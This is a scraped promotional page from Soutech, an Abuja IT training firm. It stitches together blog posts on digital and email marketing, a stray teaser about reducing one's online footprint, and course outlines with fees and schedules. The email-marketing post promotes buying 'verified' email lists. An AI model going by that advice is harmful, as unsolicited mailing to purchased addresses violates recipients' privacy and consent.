You can as well take a website design training with Soutech, a training that will enable you build and easily manage your website by yourself.
Become your own boss: Digital Marketing Comprehensive training in Abuja,PortHarcourt,Lagos Nigeria- SOUTECH Web ConsultsSouTech Team
SPEND ONLY FIVE (5) HOURS AT SOUTECH – BECOME YOUR OWN BOSS
Written by Vincent N. -App Developer Head @SOUTECH
The second half of 2017 is about to begin and all you do is sit down there counting your disappointments already? Oh, let me guess; you are still busy scouting offices with your resume. I must agree that applying for a wonderful job is beneficial, but why don’t you try a proposal instead? Chances of securing employment are smaller when you are just applying for a job like any other applicant, of course they are many to choose from. Believe it or not, it is a fact that chances are small for any reasonable boss to reject a proposal than an application. At least not when you propose a beneficial growth and cost effective marketing strategy to an organisation.
COST EFFECTIVE MARKETING STRATEGY?
Well, good for you if you have heard of marketing and know how it works, that makes it easier. But we are not talking about spending 4 years in the university to study marketing, no. We are talking of spending only 5 hours to acquire strategic skills that will make you become you own boss in digital marketing. You do not necessarily need to be a marketer or study marketing. In fact, it has nothing to do with your field of study. Becoming a Digital marketer is as easy as sharing a picture on social media, only that you will need to apply some special skills to achieve specific results.
WHY DO ORGANISATIONS NEED DIGITAL MARKETERS?
Simple, because the internet is there. Digital marketing has proven to be more effective than traditional marketing. For instance, it is cost effective in the sense that you do not necessarily need to spend a huge resource for one potential customer, unlike traditional marketing. Also, you can target your marketing to a specific group of people (Target Audience) who are likely to have interest in the product or service you are marketing. Digital marketing provides small and medium businesses the opportunity to compete and attract their share of targeted traffic. Sales and marketing processes that were previously available only to large corporations are now available to small companies due to digital marketing. Digital marketing also delivers conversion in the sense that success is being measured by percentage rate of incoming traffic and it’s converted into leads, subscribers and sales. So any organisation that wants a better return of investment (ROI), builds brand reputation, reach out to mobile consumers, earn customers’ trust and ensure online business survival will definitely want to listen to you when you mention digital marketing.
WHY SHOULD YOU LEARN THESE STRATEGIES?
The good thing is, you will become an important player to any prospective organisation that finds your skills useful. Digital marketing is a process; it is not a one-time event, so you are always needed. You can do digital marketing from anywhere so far there is a computer device and an internet connection. You can choose who you work with as well as decide to work for as many organisations as you deemed if you decide to freelance. Unlike traditional marketing, you do not need to market product and service to people on the streets. You can also set up your own Digital Marketing Company and use your built-up marketing lists as a key tool. So what do you say?
WHAT WILL YOU ACHIEVE?
At Soutech in five 5 hours, you will learn simple, but effective techniques that will yield results and how to use them practically. You will also learn how to use some digital marketing tools effectively, How to build and maintain re-useable customer list for continuous marketing. How to create effective (call to action) CTA and convergence. You will also be given a certificate of completion.
Expecting you at Soutect Web Consult, Kano Street, Area 1, Abuja
If you’re reading this, it’s highly likely your personal information is available to the public. And by “public” I mean everyone everywhere. And while you can never remove yourself completely from the internet, there are ways to minimize your online footprint. Here are five ways to do it.
Be warned however; removing your information from the internet as I’ve laid it out below, may adversely affect your ability to communicate with potential employers, friends and relatives.
Seeking to escape the internet? While online notoriety thrills some people, for others, it can become a great burden. Erasing yourself completely is not always possible, but if you follow these steps, you can certainly come close.
Grow your BUSINESS, The Money is in the List(Subscriber Base): Email Marketing Secret from SOUTECH VENTURESSouTech Team
BUSINESS GROWTH: THE EFFECT OF EMAIL MARKETING
Have you ever received an email notification from Soutech, Dstv, Konga or Jumia informing you about some new products or a possible discount on specific products? That is called email marketing. It is a process where you market your products and services to existing clients/customers or to an email list. It is one of the most effective ways of marketing and building targeted customers. Individuals have seen the impacts and the force that email advertising records hold and there is more than adequate evidence to reveal to us that through email promoting records, you can most likely grow your business and accomplish a higher inflow of wage inside of a brief time of time.
If you are short on time and experience, there are tons of services that will actually handle the whole process of email marketing for you. Online marketing had exploded with hungry internet marketers in the last 5 years which have made it really easy to outsource this kind of work.
List of some popular email services are:
One of the benefits of using an email service marketing service is SPAM. Email marketing can be done manually, but if you are reported by some subscribers, your email ID will be spam tag which is really not good for business.
Building your Email List (opt-in email)
Email marketing is becoming a lot easier these days as the digital marketing industry continue to grow. If you are tech savvy you can simply sign up to an auto-responder service & get started. Most email marketing services will provide you with comprehensive training on how to complete your email list building & marketing campaigns. First, you will require an email list for people to subscribe to, this is easily achieved by using an opt-in page or form which will be provided by your email marketing service. You can also purchase email list from I.T. professionals such as Soutech Web Consult or learn how to build an email list by taking a training on digital marketing.
Strategy: The act of giving.
The most common way to build your email lists is to offer something that will entice visitors to enter their contact details to your opt-in form ie; free report, free training, free software, newsletter, etc. or inviting prospective recipients to register on a form in order to qualify for an upcoming draw or promo.
Depending on your email provider, most should give you the ability to create a variety of lists. This is helpful if you want to separate your subscribers by gender, ethnicity, location, etc. This feature is helpful and will make it easy for you to market specific products to specific subscribers.
As you know email marketing is a very important part for your business to keep in contact with your existing clients. Email marketing is used for the different purpose as per your need, but most of them used to promote their business to increase the sales for that you will need an email marketing service that is cost effective and convenient. Get Nigerian verified email addresses from Soutech Web Consult or learn how to build an email list by taking a taking a training on digital marketing.
Call 08034121380 to get started.
SOUTECH Web Consults – (a smart and budding Information Technology (IT) firm with innovative, intelligent, knowledgeable and experienced consultants, trainers and developers.
To be efficient in IT service delivery and management you need core practical training from SOUTECH Web Consults to help you in:
- Critical thinking and problem solving skills
- Communication skills
- Collaboration skills
- Creativity and innovation skills
Who Should Take The Course?
- Anyone responsible for developing or implementing your organization’s online strategy.
- Professionals who need to understand Digital Marketing, Mobile App Development or get more out of their Digital channels.
- Marketers who want to fast-track their career or improve their position in the market-place.
- Small Business owners who need to maximise online channels for growing their business.
- Students who want to upskill in Digital Marketing, Mobile App Development and Website Design
- You are smart enough to want to Learn to Earn….Yes you can!
We look forward to training you in the following courses.
3 IN 1 COMBO TRAINING PACKAGE
Why should we train you?
We are industry experts and have deployed web solutions for clients across board and still counting.
Here are some recent Students!
Web Development Training in Partnership with NITDA
DIGITAL MARKETING TRAINING MODULES
Digital Marketing Course Outline
This course provides a complete overview of all aspects of digital marketing and how to integrate and use them to achieve business objectives. It is designed to cover the complete marketing mix and be relevant across multiple roles and disciplines, whether client side or agency.
Who should attend?
- Marketers who have some experience in digital but want to grow their confidence
- Those who may have only one perspective of digital, or be a specialist in one area of digital, and want to broaden their skill base
- Those marketing and advertising professionals who are new to digital and keen to learn how to leverage digital across a broad spectrum of channels
- Those who are interested in seeing how digital is approached from both client and agency perspective.
- Understand the scope of digital marketing and how it integrates with overall business and marketing strategy
- How to assess various digital channels and understand which are most suitable to an idea or solution
- Understand the fundamentals of digital marketing campaign, and be able to apply it to achieve your business objectives.
- Fundamentals – Understanding consumers
- How the online marking landscape is changing
- Understanding consumer behavior and translating that into good customer experience.
- Fundamentals – Content
- Content strategy, planning, creation and designing for the brand
- Channel constraints and video content,
- Fundamentals – Data
- What is big data and how can we use it?
- Metrics, measurement and evaluation.
- Tools – Owned media: Website
- Website development and responsive design
- Designing for usability, function and effectiveness
- Website Conversion funnels
- Search engine Optimization.
- Tools – Owned media: Mobile and email
- Mobile sites and apps
- Email strategy, designing for response, data management and the spam act.
- Tools – Owned and earned: Social
- Social platforms and an overview of how they are used
- Social as an earned medium
- Social media monitoring and community management.
- Tools – Paid media
- The paid media landscape, targeting, data and technology
- Networks, affiliates, email lists and digital out-of-home
- Paid search – how it works and search for mobile.
- Applications – Managing digital marketing
- Managing digital projects
- Budgets, dashboards and templates
- Applications – Campaign planning
- Planning campaigns for awareness/branding, acquisition and retention
- Applications – Optimization and emerging trends
- Testing – A/B and multivariate and optimization
- Emerging media, technology and trends.
PROFESSIONAL WEBSITE DESIGN TRAINING
It is a Practical Training where you will be held by the hand step by step as you acquire life skills in professional database/ecommerce/CMS Web Design
You will be shown step by step how to create the following types of websites:
> Church Websites with live streaming – thousands of churches are waiting for you.
> Hotel Websites with online reservation – this will make you money.
> SMS Portal Websites with voice, sms, shortcode, etc
> eCommerce Websites like jumia, konga with shoping cart, online payments, etc
> Corporate Websites with slides, security, etc – clients will love you for this
> Membership sites with login and access restriction – This skill will explode your bank account.
Apart from Web design and digital marketing, the training will also cover:
> Strategy To Building A Highly Responsive Email And Mobile List
> How To Captivate and Engage Your Audience and Generate More Sales With Email Marketing.
> How to Use Copywriting to Sell Anything & Become Absolutely Irresistible On The Web.
> How to Create Effective Online Advertising Campaigns On Google, Facebook, Yahoo etc
>How To Attract, Engage And Retain Customers With Mobile Marketing
> Turning Your Visitors To Repeat Customers By Digitally Powered Marketing and Sales System.
> The Easy, Non-Technical Approach to Search Engine Marketing
> How To Develop Wining Social Media Strategy To Build Brands and Engage With Customers
> Creating Triggers that Get Millions of People to Spread Your Ideas and Share Your Stories.
> Video Marketing for Business Owners
> Ads Re-targeting Blueprint – How To Use Search, Engagement, Email And Contextual Re-targeting To Stay In Contact And Convert That 90% of Visitors That Left Your Website Without Buying.
Bonus tips and guides includes:
> Step By Step Pictorial eBook Creation Training
> Step By Step Online Outsourcing Training
> Step By Step Irresistible Proposal Writing Training
If you don’t want to miss this great event, reserve your seat here.
MOBILE APPLICATION DEVELOPMENT
- Understanding the mobile app toolset
- Working with jQuery Mobile and mobile starters
- Applying an overall theme to an app
- Specifying Android settings
- Simulating the iPhone
- Setting up mobile pages
- Keeping jQuery Mobile current
- Applying page transitions
- Creating collapsible content
- Defining list views with images
- Creating web forms for mobile
- Integrating geolocation data with Google Maps
- Previewing an app in Device Central
All courses comes with 30 days mentorship program to ensure you get the best and become an expert in the field of training.
Venue: Sideline, Behind CBN Junction, Karu, Abuja
- Real-life application and understanding
- Conducive learning environment
- Participants get a Certificate of Training
- Restricted and interactive classes
- Service comes with all necessary softwares
- Soft copy training(Videos and eBooks) materials will be available
- Qualified and experienced facilitators
- Get a full Audio recording of the training (No need for refresher class)
- Full certification course (Good for your CV)
- Job/Internship placement support (Optional)
- Customized soft copy of training materials will be provided
- Organized and efficient training process
- Conducive air conditioned learning environment and Parking Space
Training Requirements and Prerequisites
Participants must have basic competency in computer literacy.
Participants should come with their Laptops, Internet access will be provided for the practical sessions.
- Pay Training fee of N100,000 on or before 3rd November to reserve your seat
- Upon confirmation of your payment, an electronic receipt will be sent to your mail.
- Commence your training at SOUTECH Training Venue
Fee: NGN 100,000 ( Internet Wifi, Certificate, Light Refreshment Inclusive)
Batch 1(Weekend): 5th,6th,12th,13th,19th,20th,26th,27th( All Saturdays and Sundays in November)- Dont Miss it.
Time : 2pm – 6pm
Batch 2( Weekday): 10th-14th and 17th-21s
Interested but got questions? Call Victor , your Trainer Directly on 08034121380
*Please remember to notify us after successful payment or sending a payment notification directly to this email address: firstname.lastname@example.org, 08034121380 ,Venue: Sideline, Behind CBN Junction, Karu, Abuja